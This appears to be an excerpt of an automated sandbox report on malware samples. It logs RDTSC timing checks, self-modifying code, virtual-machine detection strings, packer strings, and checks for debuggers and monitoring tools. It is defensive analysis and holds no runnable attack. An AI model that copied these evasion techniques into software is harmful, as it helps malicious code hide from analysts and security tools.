                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1026B2F second address: 1026B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F3778D7B2C8h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1026D22 second address: 1026D2C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1026D2C second address: 1026D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3778D7B2B6h 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1026D36 second address: 1026D4B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1026EBD second address: 1026EC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1026EC7 second address: 1026F11 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F3778D7C028h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000004h 0x0000002a jmp 00007F3778D7C031h 0x0000002f push eax 0x00000030 jbe 00007F3778D7C038h 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10276FD second address: 102777A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C5h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F3778D7B2B8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push edi 0x00000026 jns 00007F3778D7B2B6h 0x0000002c pop edx 0x0000002d lea eax, dword ptr [ebp+1248B27Fh] 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007F3778D7B2B8h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d mov dx, EE84h 0x00000051 nop 0x00000052 pushad 0x00000053 je 00007F3778D7B2BCh 0x00000059 jo 00007F3778D7B2B6h 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102777A second address: 102777E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102777E second address: 1027792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jbe 00007F3778D7B2B6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1027792 second address: 1027798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1027798 second address: 102779C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 102779C second address: 10277EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F3778D7C028h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov ecx, ebx 0x00000025 lea eax, dword ptr [ebp+1248B23Bh] 0x0000002b or dx, D941h 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F3778D7C034h 0x00000038 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10277EB second address: 1027808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3778D7B2C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10591EF second address: 1059222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F3778D7C037h 0x0000000d popad 0x0000000e push esi 0x0000000f jmp 00007F3778D7C02Fh 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop esi 0x00000017 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1059534 second address: 105953C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10596A3 second address: 10596A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10596A8 second address: 10596BA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F3778D7B2B6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10596BA second address: 10596BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10596BE second address: 10596D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3778D7B2C0h 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 10596D4 second address: 10596F8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3778D7C03Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1059CC2 second address: 1059CE0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3778D7B2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F3778D7B2BEh 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1059CE0 second address: 1059CEF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3778D7C026h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105EA25 second address: 105EA69 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jng 00007F3778D7B2B8h 0x0000000e jmp 00007F3778D7B2C6h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3778D7B2C6h 0x0000001a js 00007F3778D7B2B6h 0x00000020 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105EB98 second address: 105EBE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7C02Fh 0x00000009 pop ebx 0x0000000a ja 00007F3778D7C04Eh 0x00000010 jmp 00007F3778D7C039h 0x00000015 jmp 00007F3778D7C02Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105EBE0 second address: 105EBFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F3778D7B2BAh 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105EBFA second address: 105EBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F0FD second address: 105F103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F103 second address: 105F10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3778D7C026h 0x0000000a popad 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F280 second address: 105F29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3778D7B2C9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F29F second address: 105F2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F2A5 second address: 105F2AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F2AE second address: 105F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F2B2 second address: 105F2C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3778D7B2C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F2C6 second address: 105F2CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F6F8 second address: 105F702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3778D7B2B6h 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F702 second address: 105F747 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3778D7C026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F3778D7C028h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F3778D7C041h 0x0000001a jns 00007F3778D7C02Eh 0x00000020 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F884 second address: 105F897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jl 00007F3778D7B2B6h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 105F897 second address: 105F89D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1062E8B second address: 1062EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F3778D7B2B6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007F3778D7B2B6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 1062EA7 second address: 1062EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 106B795 second address: 106B79B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 106B359 second address: 106B35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 106B35F second address: 106B363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 106B363 second address: 106B369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 106B369 second address: 106B395 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3778D7B2CEh 0x00000008 jmp 00007F3778D7B2C2h 0x0000000d jg 00007F3778D7B2B6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F3778D7B2B8h 0x0000001d rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 106B4CC second address: 106B4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 106B4D3 second address: 106B4E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3778D7B2BAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 106B4E3 second address: 106B4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeRDTSC instruction interceptor: First address: 106B4E7 second address: 106B4EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 89FB1E instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A40953 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A67900 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: ACCC9B instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSpecial instruction interceptor: First address: 101490B instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSpecial instruction interceptor: First address: E6E87C instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSpecial instruction interceptor: First address: 10265F2 instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeSpecial instruction interceptor: First address: 10A4907 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 2F490B instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 14E87C instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 3065F2 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 384907 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSpecial instruction interceptor: First address: 473CC6 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSpecial instruction interceptor: First address: 473D7F instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSpecial instruction interceptor: First address: 473C53 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSpecial instruction interceptor: First address: 61814A instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSpecial instruction interceptor: First address: 6168B9 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSpecial instruction interceptor: First address: 627D93 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeSpecial instruction interceptor: First address: 6B0D6F instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeCode function: 8_2_0537092E rdtsc 8_2_0537092E
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeAPI coverage: 3.8 %
                      Source: C:\Users\user\Desktop\file.exe TID: 7800Thread sleep time: -42021s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7788Thread sleep count: 31 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7788Thread sleep time: -62031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7784Thread sleep count: 31 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7784Thread sleep time: -62031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7780Thread sleep time: -56028s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7792Thread sleep time: -58029s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7776Thread sleep time: -54027s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6516Thread sleep count: 64 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6516Thread sleep time: -1920000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6516Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe TID: 6800Thread sleep count: 42 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe TID: 6800Thread sleep count: 90 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe TID: 6800Thread sleep count: 90 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe TID: 6800Thread sleep count: 90 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe TID: 6800Thread sleep count: 91 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe TID: 6800Thread sleep count: 66 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe TID: 6800Thread sleep count: 90 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exe TID: 6800Thread sleep count: 81 > 30Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeLast function: Thread delayed
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_00417727 FindFirstFileExW,14_2_00417727
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeCode function: 14_2_0496798E FindFirstFileExW,14_2_0496798E
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                      Source: skotes.exe, skotes.exe, 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmp, 607f096cd3.exe, 607f096cd3.exe, 0000000E.00000002.2673000317.00000000005F5000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: skotes.exe, 0000000C.00000002.2673867668.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWrF
                      Source: file.exe, 00000001.00000002.1957372627.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: file.exe, 00000001.00000002.1957372627.0000000001054000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1957372627.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2673867668.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000C.00000002.2673867668.0000000000C28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: file.exe, 00000001.00000002.1956491090.0000000000A25000.00000040.00000001.01000000.00000003.sdmp, DocumentsIIEBGIDAAF.exe, 00000008.00000002.1994569621.0000000000FF8000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000009.00000002.2025405033.00000000002D8000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 0000000A.00000002.2037796544.00000000002D8000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 0000000C.00000002.2672964510.00000000002D8000.00000040.00000001.01000000.00000009.sdmp, 607f096cd3.exe, 0000000E.00000002.2673000317.00000000005F5000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeFile opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeFile opened: SICE
                      Source: C:\Users\user\AppData\Local\Temp\1009881001\607f096cd3.exeFile opened: SIWVID
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\DocumentsIIEBGIDAAF.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
